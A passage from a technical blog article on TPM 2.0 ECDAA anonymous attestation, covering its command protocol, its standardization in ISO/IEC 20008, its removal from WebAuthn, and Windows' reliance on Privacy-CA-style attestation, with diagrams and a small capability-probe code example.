The 256-bit Barreto-Naehrig curve identifier the TPM 2.0 Library Specification mandates for any ECDAA-capable signing key. BN-P256 is *not* NIST P-256: it is a pairing-friendly curve with embedding degree 12 whose group structure admits the Type-3 pairings the DAA verification equation requires. Implementations that confuse the two will produce signatures that verify against the wrong group.

The command pair defined in TPM 2.0 Library Specification Part 3 that implements the Chen-Page-Smart 2010 split-protocol structure. `TPM2_Commit(keyHandle, P1, s2, y2)` returns commitment points `(K, L, E)` plus a `counter`. The host then computes the Fiat-Shamir challenge `c` over the message and the commitment points. `TPM2_Sign(keyHandle, digest, scheme=TPM_ALG_ECDAA, validation)` returns the Schnorr-style response `s = r + c·f mod p`. The host assembles the final signature from the commitment points, the challenge, and the response [@tpm-library-spec].
&lt;p&gt;The protocol split matters. The TPM, in the CPS 2010 construction, holds the secret &lt;code&gt;f&lt;/code&gt; and must perform exactly two cryptographic operations on it: produce a freshly randomized commitment to &lt;code&gt;f&lt;/code&gt; (via &lt;code&gt;TPM2_Commit&lt;/code&gt;), and produce a Schnorr response that proves knowledge of &lt;code&gt;f&lt;/code&gt; modulo the verifier&apos;s challenge (via &lt;code&gt;TPM2_Sign&lt;/code&gt;). Everything else -- the pairing computations, the curve arithmetic in &lt;code&gt;G_T&lt;/code&gt;, the Fiat-Shamir hash, the final signature assembly -- happens on the host CPU. This is the &lt;em&gt;only&lt;/em&gt; reason the construction is practical on a TPM. A monolithic Sign that did pairing arithmetic inside the chip would be unshippable; the split offloads the expensive operations onto silicon that has them for free.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The most common implementer mistake when working with TPM 2.0 ECDAA for the first time is to reuse the NIST P-256 ECDSA code path with the curve identifier swapped. The two curves share a bit length and a hash function and otherwise nothing. BN-P256 has a pairing-friendly group structure with embedding degree 12; NIST P-256 does not admit efficient pairings at all. Signatures produced by ECDSA over NIST P-256 will not verify against an ECDAA verifier expecting BN-P256, and the converse is true. The pairing requirement is what forces the BN curve choice; treat BN-P256 as a separate primitive with a separate code path.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The Join protocol -- the one-time exchange between the Issuer and the TPM that produces the long-lived credential -- piggybacks on a TPM 2.0 command pair already present in every Windows attestation flow: &lt;code&gt;TPM2_MakeCredential&lt;/code&gt; and &lt;code&gt;TPM2_ActivateCredential&lt;/code&gt; [@tpm-library-spec]. The Issuer wraps the DAA credential under an encryption key derived from the TPM&apos;s Endorsement Key, ensuring that only the legitimate TPM (the one that holds the EK private key) can decrypt the credential and bind it to its internal &lt;code&gt;f&lt;/code&gt;.The choice of &lt;code&gt;TPM2_ActivateCredential&lt;/code&gt; as the Join anchor is convenient. The same primitive that TPM 2.0 attestation-key certification flows use for AIK-binding gets reused for DAA-credential binding. An OEM that supports &lt;code&gt;TPM2_ActivateCredential&lt;/code&gt; for ordinary AIK enrollment already has 80% of the firmware path the Join protocol needs. The difference is in what the Issuer ships back -- a per-TPM AIK certificate in the AIK case, an Issuer-randomized CL credential in the DAA case.&lt;/p&gt;
&lt;p&gt;Part 1 Annex C.5 contains the informative mathematical description -- the actual ECDAA verification equation, the basename-pseudonym derivation, the proof-of-knowledge template. Part 3 contains the normative command definitions. An implementer who reads only the Part 3 command definitions without reading Annex C.5 will have correct byte-buffer-level semantics and no idea what the protocol is computing; an implementer who reads only Annex C.5 without the normative command definitions will have correct math and the wrong API.&lt;/p&gt;
&lt;p&gt;The implementation surface, gathered into one place:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Artifact&lt;/th&gt;
&lt;th&gt;Identifier / location&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Algorithm selector&lt;/td&gt;
&lt;td&gt;&lt;code&gt;TPM_ALG_ECDAA = 0x001A&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;TPM 2.0 Library Specification Part 2 [@tpm-library-spec]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mandatory curve&lt;/td&gt;
&lt;td&gt;&lt;code&gt;TPM_ECC_BN_P256 = 0x0010&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Part 2 [@tpm-library-spec]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;First-round command&lt;/td&gt;
&lt;td&gt;&lt;code&gt;TPM2_Commit(keyHandle, P1, s2, y2) -&amp;gt; (K, L, E, counter)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Part 3 [@tpm-library-spec]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Second-round command&lt;/td&gt;
&lt;td&gt;&lt;code&gt;TPM2_Sign(keyHandle, digest, scheme=TPM_ALG_ECDAA, validation) -&amp;gt; signature&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Part 3 [@tpm-library-spec]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Join anchor&lt;/td&gt;
&lt;td&gt;&lt;code&gt;TPM2_MakeCredential&lt;/code&gt; / &lt;code&gt;TPM2_ActivateCredential&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Part 3 [@tpm-library-spec]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Math description&lt;/td&gt;
&lt;td&gt;Part 1 Annex C.5 (informative)&lt;/td&gt;
&lt;td&gt;Part 1 [@tpm-library-spec]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Optionality status&lt;/td&gt;
&lt;td&gt;Optional since PTP v1.04 (Feb 2020); carried through v1.07 RC1 (Dec 2025)&lt;/td&gt;
&lt;td&gt;TCG PC Client Platform TPM Profile changelog [@tcg-ptp]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

sequenceDiagram
    participant V as Verifier
    participant H as Host (CPU)
    participant T as TPM
    V-&amp;gt;&amp;gt;H: send basename bsn
    H-&amp;gt;&amp;gt;T: TPM2_Commit(keyHandle, P1, s2, y2)
    T--&amp;gt;&amp;gt;H: (K, L, E, counter)
    H-&amp;gt;&amp;gt;H: compute c = H(K, L, E, message, bsn)
    H-&amp;gt;&amp;gt;T: TPM2_Sign(keyHandle, digest=c, scheme=ECDAA)
    T--&amp;gt;&amp;gt;H: response s = r + c*f mod p
    H-&amp;gt;&amp;gt;H: assemble signature (K, L, E, c, s)
    H-&amp;gt;&amp;gt;V: ECDAA signature
    V-&amp;gt;&amp;gt;V: verify pairing equation
&lt;p&gt;The TCG published the TPM 2.0 Library Specification in 2014. From 2014 through early 2020, the PC Client Platform TPM Profile -- the document that says &quot;to ship a TPM 2.0 in a PC-class device, these algorithms must be present&quot; -- listed &lt;code&gt;TPM_ALG_ECDAA&lt;/code&gt; as mandatory-if-the-platform-supports-elliptic-curve-cryptography. In v1.04 (released February 2020) the TCG PTP working group made a quiet but consequential change. The changelog records the line verbatim: &quot;Made TPM_ALG_ECDAA and TPM_ALG_ECSCHNORR optional.&quot; The same designation has carried through v1.06 RC1 (January 2025) and v1.07 RC1 (December 2025) [@tcg-ptp]. After February 2020, an OEM can ship a Windows-class TPM 2.0 platform that does not implement ECDAA at all and remain conformant.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Trusted Computing Group&apos;s resource pages (&lt;code&gt;trustedcomputinggroup.org/resource/tpm-library-specification/&lt;/code&gt; and &lt;code&gt;trustedcomputinggroup.org/resource/pc-client-platform-tpm-profile-ptp-specification/&lt;/code&gt;) reject non-browser User-Agents at the HTTP layer. This is a long-standing anti-bot policy. Citations in this article to the TPM 2.0 Library Specification and to the PC Client Platform TPM Profile point to the canonical URLs but are flagged in the verified-source registry as UNVERIFIED_FETCH; the verbatim changelog text was extracted under primary-source rules during the Stage 0a focus-premise audit and is the audit-of-record for the optionality claim. The downstream accuracy and fact-check stages of this pipeline carry the same caveat forward.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The Pluton question is the second hedge. Microsoft Pluton is the security processor Microsoft has been shipping in successive Windows-class platforms since AMD&apos;s Ryzen 6000 in 2022, in AMD Ryzen 7040 (Phoenix) in 2023, in Qualcomm Snapdragon X Elite in 2024, and in Intel Core Ultra 200V (Lunar Lake) in 2024 and successive Intel Core Ultra generations. Pluton exposes a TPM 2.0 personality. The Microsoft Learn documentation page enumerates the cryptographic algorithms the processor exposes and the platform-security primitives it implements [@pluton].&lt;/p&gt;
&lt;p&gt;The page contains zero occurrences of &lt;code&gt;ECDAA&lt;/code&gt; or &lt;code&gt;TPM_ALG_ECDAA&lt;/code&gt;. The honest framing here is &lt;em&gt;not&lt;/em&gt; &quot;Pluton does not implement ECDAA&quot; -- the documentation neither confirms nor denies it -- but &quot;Pluton&apos;s published surface does not advertise ECDAA.&quot; That is the hedged statement this article carries from its opening to its FAQ.&lt;/p&gt;
&lt;p&gt;The runnable demonstration below is &lt;em&gt;educational&lt;/em&gt; -- Microsoft ships no &lt;code&gt;BCryptDirectAnonymousAttestation&lt;/code&gt;, no &lt;code&gt;NCryptDaaSign&lt;/code&gt;, no Windows API at all that exposes ECDAA from a user-mode application. The code shows the &lt;em&gt;logic&lt;/em&gt; an admin or platform engineer would follow when probing a TPM&apos;s reported algorithm set, not a working call against any shipping Windows API.&lt;/p&gt;
&lt;p&gt;{`
// Logic only. Microsoft ships no Windows API that surfaces TPM_ALG_ECDAA.
// In practice an admin would parse the output of Get-TpmEndorsementKeyInfo
// or use a vendor-specific tool to inspect the TPM&apos;s algorithm capability table.
const TPM_ALG_ECDAA = 0x001A;
const TPM_ECC_BN_P256 = 0x0010;&lt;/p&gt;
&lt;p&gt;function probeECDAA(tpmAlgList, tpmEccCurveList) {
  const hasECDAA = tpmAlgList.includes(TPM_ALG_ECDAA);
  const hasBN256 = tpmEccCurveList.includes(TPM_ECC_BN_P256);
  if (!hasECDAA) return &apos;no ECDAA: chip omits algorithm 0x001A&apos;;
  if (!hasBN256) return &apos;ECDAA without BN-P256: nominally compliant, practically unusable&apos;;
  return &apos;ECDAA + BN-P256 present (Join still requires Issuer infrastructure)&apos;;
}&lt;/p&gt;
&lt;p&gt;// Example: a Pluton-class chip whose published surface does not advertise ECDAA.
const plutonLike = [0x0001 /* RSA &lt;em&gt;/, 0x0008 /&lt;/em&gt; SHA-256 &lt;em&gt;/, 0x0023 /&lt;/em&gt; ECDSA &lt;em&gt;/];
console.log(probeECDAA(plutonLike, [0x0003 /&lt;/em&gt; NIST P-256 */]));
// -&amp;gt; &quot;no ECDAA: chip omits algorithm 0x001A&quot;&lt;/p&gt;
&lt;p&gt;// Example: a discrete Infineon SLB9670 TPM 2.0 (vendor docs list ECDAA + BN-P256).
const discreteTpm = [0x0001, 0x0008, 0x0023, TPM_ALG_ECDAA];
console.log(probeECDAA(discreteTpm, [0x0003, TPM_ECC_BN_P256]));
// -&amp;gt; &quot;ECDAA + BN-P256 present (Join still requires Issuer infrastructure)&quot;
`}&lt;/p&gt;
&lt;p&gt;The spec was written. The chips shipped. The TCG was satisfied. So why does no one verify ECDAA signatures?&lt;/p&gt;
&lt;h2&gt;7. The Standards Bridge: ISO/IEC 20008 and 20009&lt;/h2&gt;
&lt;p&gt;There is a difference between a TCG specification section number and an ISO/IEC mechanism identifier. The difference is the price of admission to a Common Criteria protection profile and to most government procurement contracts.&lt;/p&gt;
&lt;p&gt;ISO/IEC 20008 is the international-standards anchor for anonymous digital signatures. It comes in three parts. Part 1 (&quot;General&quot;) sets the framework and terminology [@iso-20008-1]. Part 2 (&quot;Mechanisms using a group public key&quot;) catalogues the specific anonymous-signature schemes the international community has standardized -- and Mechanism 4 is the EPID-derived elliptic-curve DAA construction that aligns with the TPM 2.0 ECDAA surface [@iso-20008-2]. Part 3 (&quot;Mechanisms using multiple public keys&quot;) catalogues a different family of schemes that is not the focus of this article.&lt;/p&gt;

The international-standards series titled &quot;Information technology -- Security techniques -- Anonymous digital signatures.&quot; Part 1 (general framework) and Part 2 (mechanisms using a group public key) were both published in 2013. Mechanism 4 in Part 2 standardizes EPID-derived elliptic-curve DAA. ISO/IEC 20008 is the bibliographic anchor cited by Common Criteria protection profiles, FIPS 140-3 module-validation evidence, and government procurement specifications that need to reference a *named, internationally agreed* anonymous-signature mechanism rather than a vendor-specific construction [@iso-20008-2].
&lt;p&gt;A note on the title. Earlier drafts of this article carried the title of ISO/IEC 20008-2 as &quot;anonymous signatures with message recovery.&quot; That phrasing belongs to a different standard, ISO/IEC 9796. The verified ISO catalogue title for 20008-2 is, verbatim, &quot;Information technology -- Security techniques -- Anonymous digital signatures -- Part 2: Mechanisms using a group public key&quot; [@iso-20008-2].&lt;/p&gt;
&lt;p&gt;ISO/IEC 20009 is the companion standard for authentication. Where 20008 standardizes signatures, 20009 standardizes the challenge-response protocols that wrap signatures into entity-authentication exchanges. Part 2 (&quot;Mechanisms based on signatures using a group public key&quot;) is where TPM-style attestation lives in ISO terminology [@iso-20009-2]. A FIDO authenticator using an anonymous group-signature attestation (ECDAA or EPID) is, in ISO-speak, executing a 20009-2 mechanism that wraps a 20008-2 signature; ordinary TPM-backed Kerberos and key-attestation flows use non-anonymous keys and are separate protocol designs.&lt;/p&gt;

Intel held patents on the EPID construction. In contributing the EPID 2.0 algorithm to ISO/IEC 20008 and 20009, Intel made the underlying intellectual property available under royalty-free (RAND-Z) terms. The Wikipedia EPID article records the contribution and notes that EPID &quot;complies with international standards ISO/IEC 20008 / 20009&quot; [@wiki-epid]. The licensing structure mattered: it is what made the construction acceptable to the FIDO Alliance, to the TCG for the TPM 2.0 ECDAA surface, and to the European procurement community whose conformance regimes treat royalty-bearing cryptographic primitives differently from royalty-free ones. Exact licensing-event dates are not directly indexed in publicly fetchable Intel materials; this paragraph is inference-grade reconstruction from the Wikipedia citation chain.
&lt;p&gt;The procurement reason ISO standardization mattered is structural. A Common Criteria Protection Profile cannot, in the general case, reference a TCG specification section number. It can reference an ISO mechanism identifier. The Federal Information Processing Standards 140-3 evidence package for a cryptographic module must, in many cases, demonstrate that the cryptographic primitives the module implements are members of an internationally recognized standard family. The European Cyber Resilience Act, drafted in 2024 and applicable in stages from 2027 onward, treats compliance with a recognized international standard as one of the routes to a presumption of conformity. ISO/IEC 20008-2 Mechanism 4 is the door TPM 2.0 ECDAA walks through to be admissible in those regimes.&lt;/p&gt;
&lt;p&gt;Standardization was complete by 2014. Cryptographic primitive: CPS 2010. Security model: BFGSW 2013. ISO mechanism: 20008-2 Mechanism 4. TPM normative surface: &lt;code&gt;TPM_ALG_ECDAA&lt;/code&gt;, &lt;code&gt;TPM_ECC_BN_P256&lt;/code&gt;, &lt;code&gt;TPM2_Commit&lt;/code&gt;, &lt;code&gt;TPM2_Sign&lt;/code&gt;. Every box was checked. The next question -- the one the standardization community could not answer on its own -- was whether anyone would write a verifier.&lt;/p&gt;
&lt;h2&gt;8. The FIDO Bet That Failed (2017-2021)&lt;/h2&gt;
&lt;p&gt;In 2018, the FIDO Alliance bet that ECDAA was the missing privacy story for &lt;a href=&quot;https://paragmali.com/blog/webauthn-and-passkeys-on-windows-from-ctap-to-the-credential/&quot; rel=&quot;noopener&quot;&gt;WebAuthn&lt;/a&gt;. Three years later, W3C took the bet off the table.&lt;/p&gt;
&lt;p&gt;The bet was not casual. FIDO had a real problem. WebAuthn authenticators -- the YubiKey hardware tokens, the &lt;a href=&quot;https://paragmali.com/blog/your-face-is-not-your-password-inside-windows-hellos-hardwar/&quot; rel=&quot;noopener&quot;&gt;Microsoft Hello&lt;/a&gt; platform authenticators, the Touch ID and Face ID modules -- need to attest that they are genuine hardware. The attestation surface FIDO Alliance had inherited from U2F was &lt;em&gt;Basic Attestation&lt;/em&gt;: every authenticator in a manufacturing batch of 100,000 or more units shared one attestation key [@fido-cert-levels], so a relying party that checked the attestation learned only &quot;this is one of 100,000-plus YubiKey 5 NFCs,&quot; not which device specifically. The cohort-size rule gave Basic Attestation a workable operational privacy property. But there was an architectural fork in the road for an organization that wanted &lt;em&gt;cryptographic&lt;/em&gt; attestation privacy without the cohort-key fan-out problem.&lt;/p&gt;
&lt;p&gt;FIDO Alliance picked the cryptographic fork. The FIDO ECDAA Algorithm v2.0 specification was published as an Implementation Draft on February 27, 2018 [@fido-ecdaa-v2]. The document is the most carefully written specification of the DAA contract from a deployment perspective; the editor was Rolf Lindemann at Nok Nok Labs. The motivation section we have already quoted in §2 names the Privacy-CA failure mode in unusually direct terms.&lt;/p&gt;
&lt;p&gt;WebAuthn Level 1 reached W3C Recommendation status on March 4, 2019 [@webauthn-1]. Section 8 defined six attestation statement formats by &lt;code&gt;fmt&lt;/code&gt; identifier: &lt;code&gt;packed&lt;/code&gt;, &lt;code&gt;tpm&lt;/code&gt;, &lt;code&gt;android-key&lt;/code&gt;, &lt;code&gt;android-safetynet&lt;/code&gt;, &lt;code&gt;fido-u2f&lt;/code&gt;, and &lt;code&gt;none&lt;/code&gt;. ECDAA was not a separate format; the WebAuthn-1 §6.4.3 attestation-type list (Basic, Self, AttCA, ECDAA, None) carried ECDAA as an attestation &lt;em&gt;type&lt;/em&gt; supported &lt;em&gt;within&lt;/em&gt; the &lt;code&gt;packed&lt;/code&gt; and &lt;code&gt;tpm&lt;/code&gt; formats. An independent verification of the live HTML finds dozens of occurrences of the string &quot;ecdaa&quot; in the Level 1 Recommendation -- ECDAA had its own type identifier, its own signing logic, and its own verification procedure embedded inside the two formats that mattered [@webauthn-1].&lt;/p&gt;
&lt;p&gt;WebAuthn Level 2 reached W3C Recommendation status on April 8, 2021 [@webauthn-2] [@wiki-webauthn]. The same independent verification against the live Level 2 HTML returns zero occurrences of &quot;ecdaa.&quot; Every reference -- the type identifier, the signing rules, the verifier procedure that the &lt;code&gt;packed&lt;/code&gt; and &lt;code&gt;tpm&lt;/code&gt; formats invoked -- was removed in a single editorial pass. The Yubico migration guide for its Java WebAuthn server library makes the vendor view explicit: &quot;This attestation type was removed from WebAuthn Level 2. ECDAA support has not been implemented in this library, so this value could in practice never be returned&quot; [@yubico-migration].&lt;/p&gt;
&lt;p&gt;Why did the bet fail? Four reasons, each visible from the public record.&lt;/p&gt;
&lt;p&gt;First, no major browser ever shipped an ECDAA verifier inside the &lt;code&gt;packed&lt;/code&gt; or &lt;code&gt;tpm&lt;/code&gt; statement format paths. Chromium, Firefox, and Safari implemented WebAuthn with &lt;code&gt;packed&lt;/code&gt;, &lt;code&gt;tpm&lt;/code&gt;, &lt;code&gt;fido-u2f&lt;/code&gt;, and &lt;code&gt;android-safetynet&lt;/code&gt; attestation, but the ECDAA branch within &lt;code&gt;packed&lt;/code&gt; and &lt;code&gt;tpm&lt;/code&gt; stayed unimplemented. The Yubico migration guide quoted above is the vendor-side confirmation of an industry-wide outcome [@yubico-migration].&lt;/p&gt;
&lt;p&gt;Second, the largest authenticator vendors picked the Basic and AttCA attestation types instead of ECDAA. YubiKey 5 series ships with the &lt;code&gt;packed&lt;/code&gt; format using a Basic Attestation key shared across a 100,000+-unit cohort [@yubico-yk5-attestation] [@fido-cert-levels]. Feitian, Google Titan, and other major FIDO2 authenticator vendors ship Basic Attestation under the same FIDO certification-policy cohort rule [@fido-cert-levels]. Microsoft Hello platform authenticators on Windows TPM-backed devices use the &lt;code&gt;tpm&lt;/code&gt; attestation statement format with an AIK that a Microsoft-operated CA certifies -- the AttCA type, functionally a Privacy-CA [@ms-hello-doc] [@azure-attestation]. The vendor base from which a WebAuthn relying party would actually see an attestation statement, in practice, never produced an ECDAA one.&lt;/p&gt;
&lt;p&gt;Third, FIDO ECDAA v2.0 never advanced beyond Implementation Draft. The URL slug for the document literally encodes its status: &lt;code&gt;fido-v2.0-id-20180227&lt;/code&gt; -- the &lt;code&gt;id-20180227&lt;/code&gt; segment names the format &lt;code&gt;&amp;lt;status&amp;gt;-&amp;lt;date&amp;gt;&lt;/code&gt;, and &quot;id&quot; is &quot;Implementation Draft.&quot; It never reached &quot;Proposed Standard&quot; or &quot;Approved Specification&quot; in FIDO&apos;s process [@fido-ecdaa-v2]. A relying party making a long-term technology bet on an attestation statement format that has never advanced past Implementation Draft has no reason to invest in a verifier library.&lt;/p&gt;
&lt;p&gt;Fourth, FIDO Basic Attestation&apos;s cohort-size rule (100,000+ authenticators per attestation group key, enforced contractually on the certified-authenticator side) gave the underlying privacy concern an &lt;em&gt;operational&lt;/em&gt; answer [@fido-cert-levels]. A WebAuthn relying party that sees a Basic Attestation signature learns &quot;this is one of at least 100,000 identical authenticators&quot; -- a cohort large enough that the relying party cannot, in practice, recover individual identifying information from the attestation alone. The cohort rule does not require pairing arithmetic, does not need a verifier library, and works with the same &lt;code&gt;packed&lt;/code&gt; and &lt;code&gt;tpm&lt;/code&gt; attestation formats every relying party already implements.&lt;/p&gt;

The FIDO Basic Attestation cohort minimum is a particularly clean example of how operational rules can compete directly with cryptographic primitives. The privacy property a relying party wants -- &quot;I cannot single out this device from its peers&quot; -- can be obtained by (a) hardware-anchored zero-knowledge proofs that mathematically forbid linkage (cryptographic DAA), or (b) a contractual obligation that every batch of attestation keys covers at least 100,000 devices (FIDO Basic Attestation) [@fido-cert-levels]. The cryptographic answer is mathematically stronger. The operational answer is dramatically easier to debug, audit, and revoke. Production has consistently chosen the latter.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; ECDAA shipped chips. It never shipped verifiers. Standardization is necessary but not sufficient for production deployment: production cryptography needs verifier libraries, and verifier libraries are &lt;em&gt;social&lt;/em&gt; phenomena -- they emerge from relying-party demand, SDK presence, incident-response tooling, and library-maintainer attention, none of which the cryptography itself produces. Cryptographic excellence does not predict deployment; library availability does.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is the second aha. The reader entered §8 believing that a standardized cryptographic primitive backed by FIDO, three browser vendors, and a publicly authored attestation format would deploy. They exit understanding that ECDAA standardized everything except the social machinery -- and the social machinery is where production attestation actually lives.&lt;/p&gt;
&lt;p&gt;If a consortium with FIDO&apos;s privacy mandate, browser-vendor coalition, and authenticator-vendor base could not generate enough relying-party momentum to keep ECDAA in WebAuthn, what chance did the silent option in TPM 2.0 ever have? The answer requires walking the Microsoft attestation stack.&lt;/p&gt;
&lt;h2&gt;9. Windows: A Billion Chips, Zero Production Use (2014-Present)&lt;/h2&gt;
&lt;p&gt;Microsoft has shipped over a billion Windows TPM 2.0 platforms [@ms-pluton-blog] [@wiki-windows-11]. Microsoft has not shipped a Windows DAA API. The two facts are not in tension. They are the story.&lt;/p&gt;
&lt;p&gt;The shipping Windows attestation stack is documented and unambiguous. Microsoft Azure Attestation is the production-grade attestation service. Its public architecture document describes the protocol in five paragraphs that read, line for line, like TPM 1.1 from 2003 [@azure-attestation]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;Every TPM ships with a unique asymmetric key called the endorsement key (EK)... A certification authority (CA) establishes trust in the TPM either via EKPub or EKCert... A device proves to the CA that the key for which the certificate is being requested is cryptographically bound to the EKPub and that the TPM owns the EKPriv. The CA issues a certificate with a special issuance policy to denote that the key is now attested as protected by a TPM.&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The architecture is the Privacy-CA architecture. The Microsoft-operated CA inputs an EK certificate and outputs a JWT that downstream Microsoft services (Defender for Endpoint device-compliance, Intune Conditional Access policies, Entra ID conditional access, customer-defined Azure Attestation policies) consume. The Windows Health Attestation Service, the older Microsoft surface that predated Azure Attestation, used the same broker model with different deployment shape. The Defender for Endpoint device-compliance flow that gates Conditional Access on attested TPM boot state consumes WHAS or Azure Attestation JWTs, not raw DAA quotes.&lt;/p&gt;
&lt;p&gt;Microsoft Pluton&apos;s published surface tells the same story from the silicon side. Pluton is the security processor Microsoft has been shipping in successive Windows-class platforms. Its Microsoft Learn page enumerates the cryptographic algorithms and platform-security primitives the processor exposes [@pluton]. The page is exhaustive about TPM 2.0 baseline algorithms (RSA-2048, ECDSA over NIST P-256, SHA-2 family). It contains zero occurrences of &lt;code&gt;ECDAA&lt;/code&gt;, of &lt;code&gt;TPM_ALG_ECDAA&lt;/code&gt;, or of any phrase like &quot;anonymous attestation.&quot; Insufficient public evidence to assert that Pluton implements ECDAA; sufficient evidence to assert that Pluton&apos;s published surface does not advertise it.&lt;/p&gt;
&lt;p&gt;The Windows API surface gap is the third piece of evidence. The TPM Base Services (&lt;code&gt;Tbsi_*&lt;/code&gt; functions in &lt;code&gt;Tbs.dll&lt;/code&gt;) expose &lt;code&gt;TPM2_Commit&lt;/code&gt; and &lt;code&gt;TPM2_Sign&lt;/code&gt; to user-mode applications -- but only as raw command-buffer submissions. There is no &lt;code&gt;BCryptDirectAnonymousAttestation&lt;/code&gt;. There is no &lt;code&gt;NCryptDaaSign&lt;/code&gt;. There is no Web Authentication API wrapper that surfaces ECDAA.&lt;/p&gt;
&lt;p&gt;The TPM Platform Crypto Provider (PCP) that Windows ships as part of the Cryptography Next Generation (CNG) framework supports RSA and ECDSA TPM-backed keys but does not surface ECDAA. The TSS.MSR open-source TPM stack from Microsoft Research does not ship a DAA wrapper. An application developer who wants ECDAA on Windows today writes raw &lt;code&gt;TBS_SUBMIT_COMMAND&lt;/code&gt; byte buffers against the documented TPM 2.0 command numbering, manages the Join protocol against an Issuer of their own provisioning, and verifies the resulting signatures with a library they wrote themselves or pulled from a research-grade implementation.&lt;/p&gt;
&lt;p&gt;The interesting question is why. Microsoft has never published a &quot;we considered DAA and chose the broker model because...&quot; statement. Treating that absence honestly, the four reasons below are &lt;em&gt;inferences&lt;/em&gt; from observable architecture decisions, not Microsoft-engineer-published rationales. The article labels them as such.&lt;/p&gt;
&lt;p&gt;First, &lt;em&gt;operational simplicity&lt;/em&gt;. A hosted CA with audit logs is more debuggable than a per-relying-party DAA verifier with no central audit point. When a device fails attestation in production, the on-call engineer reading the Azure Attestation logs can answer &quot;why did this device fail?&quot; in seconds; the same question against a DAA verifier requires reasoning about pairing arithmetic, basename derivation, and Issuer-credential validity. Engineering organizations choose architectures whose failure modes they can debug.&lt;/p&gt;
&lt;p&gt;Second, &lt;em&gt;revocation economics&lt;/em&gt;. A Privacy-CA can revoke an AIK by removing one certificate from its issued-certificate store. Revoking a DAA credential, in the construction TPM 2.0 ships, requires either EPID-style signature-based revocation -- which the TPM 2.0 ECDAA scheme does not provide -- or a private-key list distributed to every relying party (extracting the private key from the misbehaving TPM is presumed possible after compromise, and verifiers then check that the signing key is not on the list). The CA&apos;s revocation primitive is a database delete. The DAA revocation primitive is an SDK rollout to every consumer of the verification library.&lt;/p&gt;
&lt;p&gt;Third, &lt;em&gt;the relying-party stack&lt;/em&gt;. DAA verifier libraries are not present in any mainstream cloud platform&apos;s SDK. The .NET CNG surface, the Java JCA, the Python &lt;code&gt;cryptography&lt;/code&gt; library, the Go &lt;code&gt;crypto&lt;/code&gt; standard library, the Rust &lt;code&gt;ring&lt;/code&gt; and &lt;code&gt;dalek&lt;/code&gt; ecosystems -- none ship an ECDAA verifier. X.509 / PKI verifier libraries, by contrast, are everywhere. A relying party building on top of mainstream SDKs gets PKI verification for free; gets DAA verification for nothing close to free.&lt;/p&gt;
&lt;p&gt;Fourth, &lt;em&gt;the Windows API surface gap is itself the obstacle&lt;/em&gt;. Adding a &lt;code&gt;BCrypt&lt;/code&gt; / &lt;code&gt;NCrypt&lt;/code&gt; / WebAuthn DAA wrapper to Windows requires designing a new key-storage provider contract, defining the JOIN-protocol service interface, writing the conformance test suite, drafting the security documentation, and rolling it out on the Windows release calendar. That is a project the size of Windows Hello&apos;s. Microsoft has not, to public knowledge, prioritized it.&lt;/p&gt;

flowchart TD
    HW[&quot;TPM 2.0 hardware&lt;br /&gt;(discrete or Pluton)&lt;br /&gt;TPM_ALG_ECDAA may be present&quot;]
    TBS[&quot;TPM Base Services&lt;br /&gt;(Tbs.dll, kernel)&quot;]
    PCP[&quot;TPM Platform Crypto Provider&lt;br /&gt;(BCrypt / NCrypt)&lt;br /&gt;RSA and ECDSA only&quot;]
    AZ[&quot;Microsoft Azure Attestation&lt;br /&gt;(Privacy-CA architecture)&quot;]
    WHAS[&quot;Windows Health Attestation Service&lt;br /&gt;(Privacy-CA architecture)&quot;]
    RP[&quot;Intune / Defender / Entra&lt;br /&gt;Conditional Access enforcement&quot;]
    HW --&amp;gt; TBS
    TBS --&amp;gt; PCP
    PCP --&amp;gt; AZ
    PCP --&amp;gt; WHAS
    AZ --&amp;gt; RP
    WHAS --&amp;gt; RP
    HW -.-&amp;gt;|&quot;ECDAA path exists&lt;br /&gt;no Windows API&quot;| HW
&lt;p&gt;The deeper reading -- the one that makes Microsoft&apos;s choice look structural rather than accidental -- starts from a comparison the four inferences above already pointed toward.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Privacy-CA brokers and DAA solve the same problem -- prove the TPM is genuine without disclosing which TPM. They differ only in &lt;em&gt;where the trust assumption lives&lt;/em&gt;. The broker treats privacy as an operational policy (the CA promises not to log, audit logs prove it kept the promise, regulators enforce the promise). DAA treats privacy as a mathematical property (the issuer cannot link, period, no audit needed). The architecture that wins in production is the one with the &lt;em&gt;smaller operational surface&lt;/em&gt;, not the one with the &lt;em&gt;better cryptographic guarantee&lt;/em&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
